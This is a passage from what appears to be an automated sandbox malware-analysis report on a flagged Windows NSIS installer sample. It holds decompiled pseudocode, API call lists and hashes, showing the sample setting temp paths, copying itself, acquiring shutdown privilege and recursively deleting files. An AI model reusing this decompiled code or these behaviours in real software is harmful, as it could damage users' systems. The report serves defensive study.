                                                                                                                        								__eflags = _t178 - _t189;
                                                                                                                        								if(_t178 != _t189) {
                                                                                                                        									goto L29;
                                                                                                                        								}
                                                                                                                        								goto L28;
                                                                                                                        							}
                                                                                                                        							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                                                        							__eflags = _t179 - _t210;
                                                                                                                        							if(_t179 == _t210) {
                                                                                                                        								L23:
                                                                                                                        								 *0x434fa0 = 1;
                                                                                                                        								goto L24;
                                                                                                                        							}
                                                                                                                        							__eflags = _t179 - _t189;
                                                                                                                        							if(_t179 != _t189) {
                                                                                                                        								goto L24;
                                                                                                                        							}
                                                                                                                        							goto L23;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						goto L16;
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						L16:
                                                                                                                        						_t199 = _t199 + 2;
                                                                                                                        						__eflags =  *_t199 - _t210;
                                                                                                                        					} while ( *_t199 == _t210);
                                                                                                                        					goto L17;
                                                                                                                        				}
                                                                                                                        				goto L37;
                                                                                                                        			}
                                                                                                                        0x0040386f
                                                                                                                        0x00403878
                                                                                                                        0x0040387f
                                                                                                                        0x00403882
                                                                                                                        0x00403a59
                                                                                                                        0x00403a59
                                                                                                                        0x00403a5e
                                                                                                                        0x00403a67
                                                                                                                        0x00403a84
                                                                                                                        0x00403afc
                                                                                                                        0x00403afc
                                                                                                                        0x00403b04
                                                                                                                        0x00403b06
                                                                                                                        0x00403b06
                                                                                                                        0x00403b0c
                                                                                                                        0x00403b0c
                                                                                                                        0x00403a9b
                                                                                                                        0x00403aa7
                                                                                                                        0x00403ab8
                                                                                                                        0x00403abf
                                                                                                                        0x00403ac6
                                                                                                                        0x00403ac6
                                                                                                                        0x00403ace
                                                                                                                        0x00403ada
                                                                                                                        0x00403ae8
                                                                                                                        0x00403af3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403adc
                                                                                                                        0x00403adc
                                                                                                                        0x00403add
                                                                                                                        0x00403adf
                                                                                                                        0x00403ae0
                                                                                                                        0x00403ae1
                                                                                                                        0x00403ae6
                                                                                                                        0x00403af5
                                                                                                                        0x00403af7
                                                                                                                        0x00000000
                                                                                                                        0x00403af7
                                                                                                                        0x00000000
                                                                                                                        0x00403ae6
                                                                                                                        0x00403ada
                                                                                                                        0x00403a71
                                                                                                                        0x00403a78
                                                                                                                        0x00403a78
                                                                                                                        0x0040388e
                                                                                                                        0x00403935
                                                                                                                        0x00403935
                                                                                                                        0x00403941
                                                                                                                        0x00000000
                                                                                                                        0x00403941
                                                                                                                        0x0040389f
                                                                                                                        0x004038a7
                                                                                                                        0x004038f9
                                                                                                                        0x004038f9
                                                                                                                        0x004038ff
                                                                                                                        0x00403906
                                                                                                                        0x00403954
                                                                                                                        0x00403956
                                                                                                                        0x0040395b
                                                                                                                        0x0040395d
                                                                                                                        0x00403965
                                                                                                                        0x00403965
                                                                                                                        0x00403970
                                                                                                                        0x00403975
                                                                                                                        0x0040397c
                                                                                                                        0x00403982
                                                                                                                        0x00403984
                                                                                                                        0x00403a57
                                                                                                                        0x00403a57
                                                                                                                        0x00403a57
                                                                                                                        0x00000000
                                                                                                                        0x0040398a
                                                                                                                        0x0040398a
                                                                                                                        0x0040398c
                                                                                                                        0x0040398d
                                                                                                                        0x00403996
                                                                                                                        0x0040398f
                                                                                                                        0x0040398f
                                                                                                                        0x0040398f
                                                                                                                        0x0040399c
                                                                                                                        0x004039a4
                                                                                                                        0x004039ab
                                                                                                                        0x004039b3
                                                                                                                        0x004039b3
                                                                                                                        0x004039c0
                                                                                                                        0x004039cc
                                                                                                                        0x004039d6
                                                                                                                        0x004039d6
                                                                                                                        0x004039d8
                                                                                                                        0x004039df
                                                                                                                        0x004039e9
                                                                                                                        0x004039f5
                                                                                                                        0x004039fb
                                                                                                                        0x00403a01
                                                                                                                        0x00403a04
                                                                                                                        0x00403a0e
                                                                                                                        0x00403a14
                                                                                                                        0x00403a16
                                                                                                                        0x00403a1a
                                                                                                                        0x00403a2b
                                                                                                                        0x00403a31
                                                                                                                        0x00403a36
                                                                                                                        0x00403a38
                                                                                                                        0x00403a3b
                                                                                                                        0x00403a41
                                                                                                                        0x00403a41
                                                                                                                        0x00403a38
                                                                                                                        0x00403a16
                                                                                                                        0x00403a44
                                                                                                                        0x00403a4b
                                                                                                                        0x00403a4b
                                                                                                                        0x00403a4b
                                                                                                                        0x00403a4b
                                                                                                                        0x00403a52
                                                                                                                        0x00000000
                                                                                                                        0x00403a52
                                                                                                                        0x00403984
                                                                                                                        0x00403908
                                                                                                                        0x0040390b
                                                                                                                        0x0040390f
                                                                                                                        0x00403914
                                                                                                                        0x00403916
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403922
                                                                                                                        0x0040392d
                                                                                                                        0x00403932
                                                                                                                        0x00000000
                                                                                                                        0x00403932
                                                                                                                        0x004038b0
                                                                                                                        0x004038c8
                                                                                                                        0x004038d9
                                                                                                                        0x004038da
                                                                                                                        0x004038de
                                                                                                                        0x004038e0
                                                                                                                        0x004038ee
                                                                                                                        0x004038f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004038f5
                                                                                                                        0x004038f7
                                                                                                                        0x00000000
                                                                                                                        0x004038f7
                                                                                                                        0x0040381a
                                                                                                                        0x00403826
                                                                                                                        0x0040382b
                                                                                                                        0x00403830
                                                                                                                        0x00403832
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040383a
                                                                                                                        0x00403842
                                                                                                                        0x00403853
                                                                                                                        0x0040385b
                                                                                                                        0x0040385d
                                                                                                                        0x00403862
                                                                                                                        0x00403864
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403864
                                                                                                                        0x00000000
                                                                                                                        0x004037c1
                                                                                                                        0x0040376a
                                                                                                                        0x0040376c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040376e
                                                                                                                        0x00403772
                                                                                                                        0x00403776
                                                                                                                        0x0040377d
                                                                                                                        0x0040377d
                                                                                                                        0x0040377d
                                                                                                                        0x0040377d
                                                                                                                        0x00000000
                                                                                                                        0x0040377d
                                                                                                                        0x00403778
                                                                                                                        0x0040377b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040377b
                                                                                                                        0x00403714
                                                                                                                        0x00403718
                                                                                                                        0x0040371b
                                                                                                                        0x00403722
                                                                                                                        0x00403722
                                                                                                                        0x00000000
                                                                                                                        0x00403722
                                                                                                                        0x0040371d
                                                                                                                        0x00403720
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403720
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004036ee
                                                                                                                        0x004036ee
                                                                                                                        0x004036ef
                                                                                                                        0x004036f0
                                                                                                                        0x004036f0
                                                                                                                        0x00000000
                                                                                                                        0x004036ee
                                                                                                                        0x00000000

APIs
• SetErrorMode.KERNELBASE(00008001), ref: 00403550
• GetVersionExW.KERNEL32(?), ref: 00403579
• GetVersionExW.KERNEL32(0000011C), ref: 00403590
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
• #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
• OleInitialize.OLE32(00000000), ref: 0040366A
• SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
• GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" ,00000000), ref: 004036D6
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
• DeleteFileW.KERNELBASE(1033), ref: 0040386F
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" ,00000000,?), ref: 0040397C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                        • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                        • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                        • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph for function 004056DE; legend: Executed / Not Executed]
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                        				struct HWND__* _v8;
                                                                                                                        				long _v12;
                                                                                                                        				struct tagRECT _v28;
                                                                                                                        				void* _v36;
                                                                                                                        				signed int _v40;
                                                                                                                        				int _v44;
                                                                                                                        				int _v48;
                                                                                                                        				signed int _v52;
                                                                                                                        				int _v56;
                                                                                                                        				void* _v60;
                                                                                                                        				void* _v68;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				struct HWND__* _t94;
                                                                                                                        				long _t95;
                                                                                                                        				int _t100;
                                                                                                                        				int _t101;
                                                                                                                        				long _t104;
                                                                                                                        				void* _t108;
                                                                                                                        				intOrPtr _t119;
                                                                                                                        				void* _t127;
                                                                                                                        				intOrPtr _t130;
                                                                                                                        				struct HWND__* _t134;
                                                                                                                        				int _t156;
                                                                                                                        				int _t159;
                                                                                                                        				struct HMENU__* _t164;
                                                                                                                        				struct HWND__* _t168;
                                                                                                                        				struct HWND__* _t169;
                                                                                                                        				int _t171;
                                                                                                                        				void* _t172;
                                                                                                                        				short* _t173;
                                                                                                                        				short* _t175;
                                                                                                                        				int _t177;
                                                                                                                        
                                                                                                                        				_t169 =  *0x433ee4; // 0x1041e
                                                                                                                        				_t156 = 0;
                                                                                                                        				_v8 = _t169;
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					__eflags = _a8 - 0x405;
                                                                                                                        					if(_a8 == 0x405) {
                                                                                                                        						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                                                        						CloseHandle(_t127); // executed
                                                                                                                        					}
                                                                                                                        					__eflags = _a8 - 0x111;
                                                                                                                        					if(_a8 != 0x111) {
                                                                                                                        						L17:
                                                                                                                        						_t171 = 1;
                                                                                                                        						__eflags = _a8 - 0x404;
                                                                                                                        						if(_a8 != 0x404) {
                                                                                                                        							L25:
                                                                                                                        							__eflags = _a8 - 0x7b;
                                                                                                                        							if(_a8 != 0x7b) {
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        							_t94 = _v8;
                                                                                                                        							__eflags = _a12 - _t94;
                                                                                                                        							if(_a12 != _t94) {
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                                        							__eflags = _t95 - _t156;
                                                                                                                        							_a8 = _t95;
                                                                                                                        							if(_t95 <= _t156) {
                                                                                                                        								L36:
                                                                                                                        								return 0;
                                                                                                                        							}
                                                                                                                        							_t164 = CreatePopupMenu();
                                                                                                                        							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                                        							_t100 = _a16;
                                                                                                                        							__eflags = _a16 - 0xffffffff;
                                                                                                                        							_t159 = _a16 >> 0x10;
                                                                                                                        							if(_a16 == 0xffffffff) {
                                                                                                                        								GetWindowRect(_v8,  &_v28);
                                                                                                                        								_t100 = _v28.left;
                                                                                                                        								_t159 = _v28.top;
                                                                                                                        							}
                                                                                                                        							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                                                                                        							__eflags = _t101 - _t171;
                                                                                                                        							if(_t101 == _t171) {
                                                                                                                        								_v60 = _t156;
                                                                                                                        								_v48 = 0x42d268;
                                                                                                                        								_v44 = 0x1000;
                                                                                                                        								_a4 = _a8;
                                                                                                                        								do {
                                                                                                                        									_a4 = _a4 - 1;
                                                                                                                        									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                                                                                        									__eflags = _a4 - _t156;
                                                                                                                        									_t171 = _t171 + _t104 + 2;
                                                                                                                        								} while (_a4 != _t156);
                                                                                                                        								OpenClipboard(_t156);
                                                                                                                        								EmptyClipboard();
                                                                                                                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                                        								_a4 = _t108;
                                                                                                                        								_t172 = GlobalLock(_t108);
                                                                                                                        								do {
                                                                                                                        									_v48 = _t172;
                                                                                                                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                                        									 *_t173 = 0xd;
                                                                                                                        									_t175 = _t173 + 2;
                                                                                                                        									 *_t175 = 0xa;
                                                                                                                        									_t172 = _t175 + 2;
                                                                                                                        									_t156 = _t156 + 1;
                                                                                                                        									__eflags = _t156 - _a8;
                                                                                                                        								} while (_t156 < _a8);
                                                                                                                        								GlobalUnlock(_a4);
                                                                                                                        								SetClipboardData(0xd, _a4);
                                                                                                                        								CloseClipboard();
                                                                                                                        							}
                                                                                                                        							goto L36;
                                                                                                                        						}
                                                                                                                        						__eflags =  *0x433ecc - _t156; // 0x0
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							ShowWindow( *0x434f08, 8);
                                                                                                                        							__eflags =  *0x434f8c - _t156;
                                                                                                                        							if( *0x434f8c == _t156) {
                                                                                                                        								_t119 =  *0x42c240; // 0x6bdacc
                                                                                                                        								_t57 = _t119 + 0x34; // 0xffffffd6
                                                                                                                        								E0040559F( *_t57, _t156);
                                                                                                                        							}
                                                                                                                        							E00404472(_t171);
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						 *0x42ba38 = 2;
                                                                                                                        						E00404472(0x78);
                                                                                                                        						goto L20;
                                                                                                                        					} else {
                                                                                                                        						__eflags = _a12 - 0x403;
                                                                                                                        						if(_a12 != 0x403) {
                                                                                                                        							L20:
                                                                                                                        							return E00404500(_a8, _a12, _a16);
                                                                                                                        						}
                                                                                                                        						ShowWindow( *0x433ed0, _t156);
                                                                                                                        						ShowWindow(_t169, 8);
                                                                                                                        						E004044CE(_t169);
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_v52 = _v52 | 0xffffffff;
                                                                                                                        				_v40 = _v40 | 0xffffffff;
                                                                                                                        				_t177 = 2;
                                                                                                                        				_v60 = _t177;
                                                                                                                        				_v56 = 0;
                                                                                                                        				_v48 = 0;
                                                                                                                        				_v44 = 0;
                                                                                                                        				asm("stosd");
                                                                                                                        				asm("stosd");
                                                                                                                        				_t130 =  *0x434f10;
                                                                                                                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                                                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                                                        				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                                                                        				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                                                        				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                                                        				 *0x433ee4 = _t134;
                                                                                                                        				_v8 = _t134;
                                                                                                                        				E004044CE( *0x433ed0);
                                                                                                                        				 *0x433ed4 = E00404E27(4);
                                                                                                                        				 *0x433eec = 0;
                                                                                                                        				GetClientRect(_v8,  &_v28);
                                                                                                                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                                                        				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                                                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                                        				if(_a8 >= 0) {
                                                                                                                        					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                                                        					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                                                        				}
                                                                                                                        				if(_a12 >= _t156) {
                                                                                                                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                                                        				}
                                                                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                        				_push(0x1b);
                                                                                                                        				E00404499(_a4);
                                                                                                                        				if(( *0x434f18 & 0x00000003) != 0) {
                                                                                                                        					ShowWindow( *0x433ed0, _t156);
                                                                                                                        					if(( *0x434f18 & 0x00000002) != 0) {
                                                                                                                        						 *0x433ed0 = _t156;
                                                                                                                        					} else {
                                                                                                                        						ShowWindow(_v8, 8);
                                                                                                                        					}
                                                                                                                        					E004044CE( *0x433ec8);
                                                                                                                        				}
                                                                                                                        				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                                                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                                                        				if(( *0x434f18 & 0x00000004) != 0) {
                                                                                                                        					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                                                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                                                        				}
                                                                                                                        				goto L36;
                                                                                                                        			}






































                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                          • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                        • ShowWindow.USER32(0001041E,00000008), ref: 004058DC
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                        • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                        • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                        • CloseClipboard.USER32 ref: 00405A61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 590372296-366298937
                                                                                                                        • Opcode ID: baf2ad6892b5c9ef88bd70007bec6f64648b90cdea62245104eba29d0ef25511
                                                                                                                        • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                        • Opcode Fuzzy Hash: baf2ad6892b5c9ef88bd70007bec6f64648b90cdea62245104eba29d0ef25511
                                                                                                                        • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph for function 00405C49 (legend: Executed / Not Executed)
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				short _v556;
                                                                                                                        				short _v558;
                                                                                                                        				struct _WIN32_FIND_DATAW _v604;
                                                                                                                        				signed int _t38;
                                                                                                                        				signed int _t52;
                                                                                                                        				signed int _t55;
                                                                                                                        				signed int _t62;
                                                                                                                        				void* _t64;
                                                                                                                        				signed char _t65;
                                                                                                                        				WCHAR* _t66;
                                                                                                                        				void* _t67;
                                                                                                                        				WCHAR* _t68;
                                                                                                                        				void* _t70;
                                                                                                                        
                                                                                                                        				_t65 = _a8;
                                                                                                                        				_t68 = _a4;
                                                                                                                        				_v8 = _t65 & 0x00000004;
                                                                                                                        				_t38 = E00405F14(__eflags, _t68);
                                                                                                                        				_v12 = _t38;
                                                                                                                        				if((_t65 & 0x00000008) != 0) {
                                                                                                                        					_t62 = DeleteFileW(_t68); // executed
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					_t64 =  ~_t62 + 1;
                                                                                                                        					 *0x434f88 =  *0x434f88 + _t64;
                                                                                                                        					return _t64;
                                                                                                                        				}
                                                                                                                        				_a4 = _t65;
                                                                                                                        				_t8 =  &_a4;
                                                                                                                        				 *_t8 = _a4 & 0x00000001;
                                                                                                                        				__eflags =  *_t8;
                                                                                                                        				if( *_t8 == 0) {
                                                                                                                        					L5:
                                                                                                                        					E0040653D(0x42f270, _t68);
                                                                                                                        					__eflags = _a4;
                                                                                                                        					if(_a4 == 0) {
                                                                                                                        						E00405E58(_t68);
                                                                                                                        					} else {
                                                                                                                        						lstrcatW(0x42f270, L"\\*.*");
                                                                                                                        					}
                                                                                                                        					__eflags =  *_t68;
                                                                                                                        					if( *_t68 != 0) {
                                                                                                                        						L10:
                                                                                                                        						lstrcatW(_t68, 0x40a014);
                                                                                                                        						L11:
                                                                                                                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                                        						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                                                                                        						_t70 = _t38;
                                                                                                                        						__eflags = _t70 - 0xffffffff;
                                                                                                                        						if(_t70 == 0xffffffff) {
                                                                                                                        							L26:
                                                                                                                        							__eflags = _a4;
                                                                                                                        							if(_a4 != 0) {
                                                                                                                        								_t30 = _t66 - 2;
                                                                                                                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                                        								__eflags =  *_t30;
                                                                                                                        							}
                                                                                                                        							goto L28;
                                                                                                                        						} else {
                                                                                                                        							goto L12;
                                                                                                                        						}
                                                                                                                        						do {
                                                                                                                        							L12:
                                                                                                                        							__eflags = _v604.cFileName - 0x2e;
                                                                                                                        							if(_v604.cFileName != 0x2e) {
                                                                                                                        								L16:
                                                                                                                        								E0040653D(_t66,  &(_v604.cFileName));
                                                                                                                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                                                                        									__eflags = _t52;
                                                                                                                        									if(_t52 != 0) {
                                                                                                                        										E0040559F(0xfffffff2, _t68);
                                                                                                                        									} else {
